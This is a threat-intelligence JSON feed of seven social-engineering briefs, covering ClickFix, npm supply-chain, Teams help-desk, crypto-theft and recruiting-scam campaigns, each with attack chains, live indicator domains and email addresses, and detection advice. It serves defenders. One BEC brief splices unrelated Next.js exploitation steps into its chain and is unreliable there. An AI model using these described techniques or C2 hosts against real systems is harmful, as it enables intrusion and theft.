{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/social-engineering/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Atomic macOS Stealer (AMOS)"],"_cs_severities":["high"],"_cs_tags":["malware","social-engineering","ai-platforms"],"_cs_type":"advisory","_cs_vendors":["Hugging Face","Acronis"],"content_html":"\u003cp\u003eThreat actors are leveraging AI distribution platforms like Hugging Face and ClawHub to distribute malware. This involves social engineering tactics to deceive users into downloading files that contain malicious code. Instead of directly compromising AI agents, the attackers abuse user trust by injecting indirect prompts into resources that the AI accesses. Acronis reported that on ClawHub, nearly 600 malicious skills across 13 developer accounts were identified distributing trojans, cryptominers, and information stealers targeting both Windows and macOS. On Hugging Face, attackers created repositories hosting malicious files designed to stage multi-step infection chains leading to infostealers, trojans, malware loaders, and other types of malware targeting Windows, Linux, and Android. This tactic allows attackers to bypass traditional security measures and leverage the platforms\u0026rsquo; reputation for trusted AI tooling.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker creates a malicious repository or skill on Hugging Face or ClawHub.\u003c/li\u003e\n\u003cli\u003eThe repository or skill contains files that appear legitimate but include malicious code.\u003c/li\u003e\n\u003cli\u003eThe attacker uses social engineering to entice users to download the files.\u003c/li\u003e\n\u003cli\u003eUpon execution, the malicious code fetches additional payloads from external sources.\u003c/li\u003e\n\u003cli\u003eFor macOS, the payload can be Atomic macOS Stealer (AMOS) Stealer.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload executes commands to install hidden dependencies.\u003c/li\u003e\n\u003cli\u003eThe malware establishes persistence on the victim\u0026rsquo;s system.\u003c/li\u003e\n\u003cli\u003eThe malware performs its intended malicious actions, such as stealing information or mining cryptocurrency.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful attacks can lead to the installation of various types of malware, including infostealers, trojans, cryptominers, and malware loaders. The targeted platforms include Windows, macOS, Linux, and Android, potentially impacting a wide range of users and systems. The abuse of trust in AI distribution platforms poses a significant risk, as users may be less likely to scrutinize files from these sources. Acronis identified close to 600 malicious skills on ClawHub alone, indicating the scale of this threat.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for execution of downloaded files from Hugging Face or ClawHub with unusual parent processes using the \u0026ldquo;Detect Suspicious Process Execution from AI Platforms\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect connections to known malicious domains or IPs associated with malware distribution campaigns that originate from processes associated with AI platform tooling.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of downloading files from untrusted sources, even on trusted platforms like Hugging Face and ClawHub.\u003c/li\u003e\n\u003cli\u003eRegularly scan systems for known malware signatures and indicators of compromise associated with infostealers and trojans.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T08:41:57Z","date_published":"2026-05-01T08:41:57Z","id":"/briefs/2026-05-huggingface-clawhub-malware/","summary":"Threat actors are using social engineering to distribute malware via AI distribution platforms such as Hugging Face and ClawHub by tricking users into downloading malicious files, which leads to malware infections on Windows, macOS, Linux, and Android systems.","title":"Malware Distribution via Hugging Face and ClawHub","url":"https://feed.craftedsignal.io/briefs/2026-05-huggingface-clawhub-malware/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Windows","Microsoft 365","Google Workspace"],"_cs_severities":["high"],"_cs_tags":["clickfix","malware","social-engineering","rat","infostealer","castleloader","netsupport"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe BackgroundFix campaign is a social engineering scheme using fake \u0026ldquo;remove your photo background\u0026rdquo; services to deliver malware. Victims are lured to malicious sites mimicking legitimate image editing tools. The sites feature fake upload interfaces, progress bars, and download buttons to appear authentic. This campaign delivers a multi-stage payload, starting with CastleLoader. CastleLoader then drops NetSupport RAT, enabling remote access for the attackers, and CastleStealer, a custom .NET stealer designed to exfiltrate browser credentials, wallet extension data, and Telegram session files. This campaign appears to be active, with multiple domains sharing the same template.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eVictim searches for an online background removal tool and lands on a malicious BackgroundFix site.\u003c/li\u003e\n\u003cli\u003eThe victim uploads an image to the fake website.\u003c/li\u003e\n\u003cli\u003eAfter clicking a checkbox, the site instructs the victim to copy a command to their clipboard.\u003c/li\u003e\n\u003cli\u003eThe copied command executes \u003ccode\u003efinger.exe\u003c/code\u003e to query \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003efinger.exe\u003c/code\u003e retrieves a batch script from the C2 server.\u003c/li\u003e\n\u003cli\u003eThe batch script executes commands to download and execute further payloads.\u003c/li\u003e\n\u003cli\u003eCastleLoader is deployed, subsequently dropping NetSupport RAT and CastleStealer.\u003c/li\u003e\n\u003cli\u003eNetSupport RAT grants the attacker remote access, while CastleStealer exfiltrates sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful attacks result in the installation of NetSupport RAT, granting attackers remote control over the compromised system. Additionally, CastleStealer exfiltrates sensitive information such as browser credentials, wallet extension data, and Telegram session files. This stolen data can be used for further malicious activities, including financial fraud, identity theft, and unauthorized access to sensitive accounts. The active nature of the campaign and the use of multiple domains suggest a broad targeting scope.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for the execution of \u003ccode\u003efinger.exe\u003c/code\u003e with command-line arguments pointing to external domains (IOC: \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect the execution of \u003ccode\u003efinger.exe\u003c/code\u003e to identify potential initial access attempts.\u003c/li\u003e\n\u003cli\u003eBlock the C2 domain \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e at the DNS resolver to prevent initial payload delivery.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for NetSupport RAT C2 communications on port 688 to detect compromised systems (IOCs: \u003ccode\u003eporonto[.]com:688\u003c/code\u003e, \u003ccode\u003egiovettiadv[.]com:688\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T13:00:00Z","date_published":"2026-04-30T13:00:00Z","id":"/briefs/2026-04-clickfix-backgroundfix/","summary":"The 'BackgroundFix' ClickFix campaign uses social engineering to trick victims into downloading malware disguised as a free image-editing tool, leading to the deployment of CastleLoader, NetSupport RAT for remote access, and CastleStealer for credential theft.","title":"ClickFix 'BackgroundFix' Campaign Delivers CastleLoader, NetSupport RAT, and CastleStealer","url":"https://feed.craftedsignal.io/briefs/2026-04-clickfix-backgroundfix/"},{"_cs_actors":["UNC6692"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Teams","Chromium"],"_cs_severities":["high"],"_cs_tags":["social-engineering","malware","cloud-abuse","credential-theft","lateral-movement"],"_cs_type":"threat","_cs_vendors":["Microsoft","Google","Amazon"],"content_html":"\u003cp\u003eUNC6692 is a newly tracked, financially motivated threat group that employs a multi-stage intrusion campaign combining persistent social engineering and custom modular malware. The actor begins by flooding a target\u0026rsquo;s email inbox before contacting them via Microsoft Teams, posing as help desk personnel to resolve the issue. This leads to a phishing attack where victims are tricked into downloading and executing malicious payloads. UNC6692 abuses legitimate cloud infrastructure, specifically AWS S3 buckets, for payload delivery, command and control (C2), and data exfiltration, allowing them to bypass traditional network reputation filters. The group\u0026rsquo;s operations are focused on gaining access and stealing credentials for further actions, ultimately aiming to exfiltrate data of interest from compromised systems. The initial campaign was observed in late December.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker floods a target\u0026rsquo;s email inbox to create a sense of urgency.\u003c/li\u003e\n\u003cli\u003eThe attacker contacts the target via Microsoft Teams, impersonating help desk personnel.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a phishing link via Teams, promising a local patch to fix the email spamming issue.\u003c/li\u003e\n\u003cli\u003eThe target clicks the link, which downloads a renamed AutoHotKey binary and an AutoHotkey script from a threat actor-controlled AWS S3 bucket.\u003c/li\u003e\n\u003cli\u003eExecution of the AutoHotKey binary automatically runs the script, initiating reconnaissance commands and installing the SNOWBELT malicious Chromium browser extension.\u003c/li\u003e\n\u003cli\u003eSNOWBELT facilitates the download of additional tools, including the Snowglaze Python tunneler, the Snowbasin Python bindshell (used as a persistent backdoor), additional AutoHotkey scripts, and a portable Python executable with required libraries.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a Python script to scan the local network for ports 135, 445, and 3389 and enumerate local administrator accounts.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a local administrator account to initiate an RDP session via Snowglaze from the compromised system to a backup server, then dumps LSASS process memory and uses pass-the-hash to move laterally to the domain controller.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe UNC6692 attack leads to the compromise of targeted systems, credential theft, and potential data exfiltration. If successful, the attacker gains control over the domain controller, allowing them to access sensitive information and potentially cause significant damage to the organization. The abuse of AWS S3 buckets allows the threat actor to blend in with legitimate cloud traffic, making detection more difficult. The financial motivation suggests that stolen credentials and data could be used for further malicious activities, such as ransomware attacks or sale on the dark web.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for AutoHotKey execution, especially when associated with downloads from unusual locations like AWS S3 buckets, to detect initial payload execution (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect unusual RDP connections initiated from compromised systems to internal servers, as this is a key lateral movement technique used by UNC6692 (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eMonitor for the installation of new Chromium extensions, especially those not distributed through the Chrome Web Store, as this is how the SNOWBELT malware is deployed.\u003c/li\u003e\n\u003cli\u003eMonitor for the use of Python scripts to scan the local network for open ports (135, 445, 3389) and enumerate local administrator accounts.\u003c/li\u003e\n\u003cli\u003eInvestigate any Microsoft Teams messages delivering links that promise to fix technical problems, as this is the initial social engineering tactic used by UNC6692.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T14:00:00Z","date_published":"2026-04-28T14:00:00Z","id":"/briefs/2026-04-unc6692-social-engineering/","summary":"UNC6692 is a newly discovered, financially motivated threat actor that combines social engineering via Microsoft Teams, custom malware named SNOWBELT, and abuse of legitimate AWS S3 cloud infrastructure in its attack campaigns to steal credentials and prepare for data exfiltration.","title":"UNC6692 Combines Social Engineering, Malware, and Cloud Abuse","url":"https://feed.craftedsignal.io/briefs/2026-04-unc6692-social-engineering/"},{"_cs_actors":["UNC4736 (Lazarus Group)"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["drift-protocol","crypto-theft","north-korea","unc4736","lazarus-group","social-engineering","supply-chain"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn April 1st, 2026, the Solana-based trading platform, Drift Protocol, experienced a sophisticated attack resulting in the theft of over $280 million. Investigations by Elliptic and TRM Labs point to North Korean hackers, possibly UNC4736 (also known as AppleJeus and Labyrinth Chollima), a threat actor previously linked to Lazarus. The attackers cultivated a presence within the Drift ecosystem over six months, posing as a quantitative firm. They approached Drift contributors in person at multiple crypto conferences, building trust and rapport. Communications continued via Telegram, where they discussed trading strategies and potential vault integrations, demonstrating technical proficiency and familiarity with Drift\u0026rsquo;s operations. The Telegram group was deleted immediately after the theft.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Reconnaissance:\u003c/strong\u003e The threat actors posed as a quantitative firm to gather information about Drift Protocol and its contributors.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eIn-Person Engagement:\u003c/strong\u003e The actors attended multiple crypto conferences, engaging with specific Drift contributors.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRelationship Building:\u003c/strong\u003e They communicated with targets via Telegram, discussing trading strategies and potential vault integrations.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePotential Compromise:\u003c/strong\u003e Two contributors were potentially compromised via a malicious code repository exploiting a VSCode/Cursor vulnerability allowing silent code execution, or via a malicious TestFlight application presented as a wallet product.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e The attack allowed the hijacking of the Security Council administrative powers.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAsset Draining:\u003c/strong\u003e The attackers drained user assets in approximately 12 minutes.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Removal:\u003c/strong\u003e The Telegram group used for engaging contributors was deleted immediately after the theft.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFunds Laundering:\u003c/strong\u003e The stolen funds were likely transferred to attacker-controlled wallets and prepared for laundering, though the wallets have been flagged across exchanges and bridge operators.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe Drift Protocol suffered a loss of over $280 million, impacting users of the Solana-based trading platform. All Drift Protocol functions remain frozen, and the compromised wallets have been removed from the multisig process. The incident highlights the risks associated with social engineering and the importance of verifying the identities of individuals and organizations interacting with critical infrastructure. The attack has also raised concerns about the security practices within the cryptocurrency sector.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for unusual network activity and potential exploitation of VSCode/Cursor vulnerabilities via \u003ccode\u003eprocess_creation\u003c/code\u003e and \u003ccode\u003enetwork_connection\u003c/code\u003e logs using the \u0026ldquo;Detect Suspicious VSCode Code Execution\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eMonitor for suspicious applications installed via TestFlight, especially those presented as wallet products, using \u003ccode\u003efile_event\u003c/code\u003e logs and the \u0026ldquo;Detect Suspicious TestFlight Application Installation\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement strict identity verification procedures for individuals and organizations interacting with sensitive systems and data.\u003c/li\u003e\n\u003cli\u003eEducate employees about social engineering tactics and the risks of interacting with unknown individuals or organizations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T16:35:39Z","date_published":"2026-04-06T16:35:39Z","id":"/briefs/2026-04-drift-hack/","summary":"The Drift Protocol suffered a $280 million crypto theft orchestrated by North Korean hackers who spent six months building an in-person operational presence within the Drift ecosystem, engaging with contributors at crypto conferences and via Telegram.","title":"Drift Protocol $280M Crypto Theft Linked to North Korean Hackers","url":"https://feed.craftedsignal.io/briefs/2026-04-drift-hack/"},{"_cs_actors":["UNC1069"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply chain attack","npm","social engineering","rat","unc1069"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn April 4, 2026, the maintainers of the Axios HTTP client disclosed a social engineering attack targeting one of their developers. The attack, attributed to the North Korean threat actor UNC1069, involved impersonating a legitimate company to build trust with the targeted developer. The attacker used a fake Microsoft Teams update disguised as a critical error fix to deploy a remote access trojan (RAT). This RAT allowed the attackers to gain access to the developer\u0026rsquo;s system and npm credentials. The attackers then published two malicious versions of Axios (1.14.1 and 0.30.4) to the npm package registry. These malicious versions included a dependency called plain-crypto-js, which installed a RAT on macOS, Windows, and Linux systems. These versions were available for three hours, posing a supply chain risk to any systems that installed them during that period.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a target developer and initiates contact via LinkedIn/Slack, impersonating a legitimate company.\u003c/li\u003e\n\u003cli\u003eThe attacker invites the developer to a Slack workspace populated with fake profiles and staged company activity.\u003c/li\u003e\n\u003cli\u003eA meeting is scheduled on Microsoft Teams, during which a fake \u0026ldquo;RTC Connection\u0026rdquo; error message is displayed.\u003c/li\u003e\n\u003cli\u003eThe attacker prompts the developer to install a \u0026ldquo;Teams update\u0026rdquo; to resolve the error.\u003c/li\u003e\n\u003cli\u003eThe fake update is a RAT malware, granting the attacker remote access to the developer\u0026rsquo;s machine.\u003c/li\u003e\n\u003cli\u003eThe attacker steals the developer\u0026rsquo;s npm credentials, bypassing MFA due to already authenticated session.\u003c/li\u003e\n\u003cli\u003eThe attacker publishes malicious versions of the Axios package (1.14.1 and 0.30.4) to the npm registry, injecting the plain-crypto-js dependency.\u003c/li\u003e\n\u003cli\u003eSystems installing the compromised Axios versions download and execute the plain-crypto-js package, resulting in RAT deployment and credential theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the Axios npm package created a supply chain attack impacting an unknown number of systems across various sectors. Systems that installed the malicious versions (1.14.1 and 0.30.4) within the three-hour window are considered compromised. Successful exploitation results in the installation of a remote access trojan (RAT) capable of stealing credentials, browser data, and other sensitive information from macOS, Windows, and Linux systems. This can lead to further unauthorized access, data breaches, and potential financial loss.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for the presence of the plain-crypto-js dependency, particularly in projects that use Axios versions 1.14.1 or 0.30.4.\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for npm accounts and other developer accounts, but recognize that authenticated sessions can be hijacked.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious NPM Package Installation\u0026rdquo; to detect potentially malicious package installations based on unusual parent processes (see below).\u003c/li\u003e\n\u003cli\u003eBlock the domain associated with the malicious dependency plain-crypto-js at the DNS resolver.\u003c/li\u003e\n\u003cli\u003eEducate developers about social engineering tactics and the risks of installing software from untrusted sources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T20:30:42Z","date_published":"2026-04-04T20:30:42Z","id":"/briefs/2026-04-axios-npm-hack/","summary":"North Korean threat actors (UNC1069) compromised the Axios npm package by socially engineering a maintainer with a fake Microsoft Teams update delivering a RAT, leading to the injection of a malicious dependency and a supply chain attack.","title":"Axios npm Package Compromised via Social Engineering","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-npm-hack/"},{"_cs_actors":[],"_cs_cves":[{"cvss":10,"id":"CVE-2025-55182"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["business-email-compromise","bec","ai","social-engineering","credential-harvesting","exploitation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eBusiness Email Compromise (BEC) attacks have historically targeted large organizations with significant payouts justifying the required time investment. However, recent trends indicate a democratization of BEC, with smaller organizations becoming increasingly targeted. This shift is largely driven by the adoption of AI, enabling attackers to rapidly reconnoiter and tailor content for smaller organizations at scale. Attackers are now targeting smaller community associations, charities, and businesses, recognizing that scamming smaller sums from many victims can be as profitable as scamming large sums from a few. These organizations are often less aware of the threat and thus more vulnerable.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eReconnaissance:\u003c/strong\u003e Attackers use AI-powered tools to gather information about target organizations and key personnel (e.g., community associations, small businesses).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpersonation:\u003c/strong\u003e Attackers craft emails impersonating trusted individuals within the organization (e.g., the chair of the association).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRequest Initiation:\u003c/strong\u003e The attacker sends an email requesting a fund transfer to an account they control, relying on social engineering to trick someone with payment authority.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEvasion:\u003c/strong\u003e The initial email is often sent from a plausible email address or a compromised genuine account.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAccount Compromise\u003c/strong\u003e: Exploit React2Shell vulnerability (CVE-2025-55182) in Next.js applications to gain access to sensitive data, including cloud tokens, database credentials, and SSH keys, which are used for lateral movement.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration\u003c/strong\u003e: Sensitive data, including cloud tokens, database credentials, and SSH keys, is exfiltrated using custom framework called \u0026ldquo;NEXUS Listener\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eObfuscation:\u003c/strong\u003e Once received, funds typically pass through money mules or compromised personal accounts before being rapidly shuffled through multiple transfers, obscuring the trail.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFinancial Gain:\u003c/strong\u003e The attacker successfully initiates the fund transfer and receives the money.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe democratization of BEC attacks expands the threat landscape to include vulnerable small organizations. While the individual sums may be smaller, the cumulative impact of successful attacks can be significant. If successful, organizations suffer financial losses, potential data breaches through stolen credentials (related to CVE-2025-55182), and reputational damage. The European Commission investigated a breach after an Amazon cloud account hack, highlighting the potential for data leaks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEducate employees, especially those with payment authority, about the signs of BEC scams, emphasizing unexpected requests for payment and the importance of verifying requests through separate channels (reference: Overview section).\u003c/li\u003e\n\u003cli\u003eImplement and enforce strict procurement rules that prevent any last-minute urgent payments (reference: Overview section).\u003c/li\u003e\n\u003cli\u003ePatch Next.js applications against React2Shell vulnerability (CVE-2025-55182) immediately and rotate potentially compromised credentials including API keys and SSH keys (reference: \u0026ldquo;The one big thing\u0026rdquo; section).\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect suspicious process creation activity (reference: rules section).\u003c/li\u003e\n\u003cli\u003eMonitor for the presence of the malware files identified in the report using the provided SHA256 hashes (reference: IOCs section).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T12:00:00Z","date_published":"2026-04-03T12:00:00Z","id":"/briefs/2026-04-democratized-bec/","summary":"Attackers are leveraging AI to rapidly reconnoiter and tailor content for smaller organizations, making it easier to execute business email compromise (BEC) scams and scam smaller sums from many victims, as demonstrated by a recent attack targeting a small community organization.","title":"Democratization of Business Email Compromise (BEC) Attacks","url":"https://feed.craftedsignal.io/briefs/2026-04-democratized-bec/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["phishing","recruiting","social-engineering","scam"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSince August 2025, a series of phishing campaigns have impersonated Palo Alto Networks talent acquisition staff, targeting senior-level professionals. The attackers leverage scraped LinkedIn data to craft personalized lures, enhancing the credibility of their outreach. This campaign involves social engineering to manufacture a bureaucratic barrier related to the candidate\u0026rsquo;s resume. The attackers falsely claim that the candidate\u0026rsquo;s resume failed to meet the applicant tracking system (ATS) requirements. They then offer to assist the candidate in acquiring a position for a fee, typically ranging from $400 to $800 for services like \u0026ldquo;executive ATS alignment\u0026rdquo; or \u0026ldquo;end-to-end executive rewrite.\u0026rdquo; The goal is to exploit the candidate\u0026rsquo;s professional ambitions by creating a sense of financial urgency and directing them to a third-party \u0026ldquo;expert\u0026rdquo; for paid services.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Outreach:\u003c/strong\u003e Attackers send personalized emails posing as Palo Alto Networks talent acquisition staff, using flattering language and details from the victim\u0026rsquo;s LinkedIn profile.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEstablish Rapport:\u003c/strong\u003e The emails use legitimate company logos and signatures to appear authentic and build trust with the targeted professional.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eManufactured Crisis:\u003c/strong\u003e Attackers claim the candidate\u0026rsquo;s resume failed to meet ATS requirements, creating a bureaucratic barrier.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eOffer of Assistance:\u003c/strong\u003e The \u0026ldquo;recruiter\u0026rdquo; offers \u0026ldquo;executive ATS alignment\u0026rdquo; services for a fee, suggesting an urgent need to update the resume.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHand-off to \u0026ldquo;Expert\u0026rdquo;:\u003c/strong\u003e The candidate is directed to a purported expert who provides structured service offers with specific price points (e.g., $400, $600, $800).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTime Pressure:\u003c/strong\u003e The \u0026ldquo;recruiter\u0026rdquo; implies that the \u0026ldquo;review panel\u0026rdquo; has already begun, urging the candidate to update their CV within a limited timeframe.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePayment Solicitation:\u003c/strong\u003e The \u0026ldquo;expert\u0026rdquo; offers to deliver the CV within hours, fitting the ostensible review window, but only after payment.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFinancial Exploitation:\u003c/strong\u003e Victims who comply with the demands pay for services that are never delivered, resulting in financial loss and potential identity theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis phishing campaign targets senior-level professionals, aiming to defraud them of hundreds of dollars through fabricated resume services. Multiple incidents have been reported, indicating a widespread effort to exploit individuals seeking job opportunities. If successful, victims lose money and may expose personal information, potentially leading to further identity theft or fraudulent activities. The campaign undermines trust in legitimate recruiting processes and damages the reputation of Palo Alto Networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement email filtering rules to flag messages from the IOC email addresses (paloaltonetworks@gmail[.]com, recruiter.paloalnetworks@gmail[.]com, phillipwalters006@gmail[.]com, posunrayi994@gmail[.]com).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic and DNS queries for connections to domains resembling \u0026ldquo;paloaltonetworks\u0026rdquo; but with slight variations, as mentioned in the overview, and implement blocking where appropriate.\u003c/li\u003e\n\u003cli\u003eEducate employees and potential job candidates about this phishing scheme, emphasizing the importance of verifying recruiter identities and avoiding payment requests during the hiring process.\u003c/li\u003e\n\u003cli\u003eDeploy a Sigma rule to detect emails originating from free email providers (e.g. gmail.com) that claim to be from a specific organization based on email content and sender information (see rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-25T12:00:00Z","date_published":"2026-03-25T12:00:00Z","id":"/briefs/2026-03-panw-recruiting-scam/","summary":"Since August 2025, threat actors have been impersonating Palo Alto Networks talent acquisition staff in a sophisticated phishing campaign targeting senior professionals, using social engineering tactics to solicit fraudulent resume fees.","title":"Palo Alto Networks Recruiting Impersonation Phishing Campaign","url":"https://feed.craftedsignal.io/briefs/2026-03-panw-recruiting-scam/"}],"language":"en","title":"CraftedSignal Threat Feed — Social-Engineering","version":"https://jsonfeed.org/version/1.1"}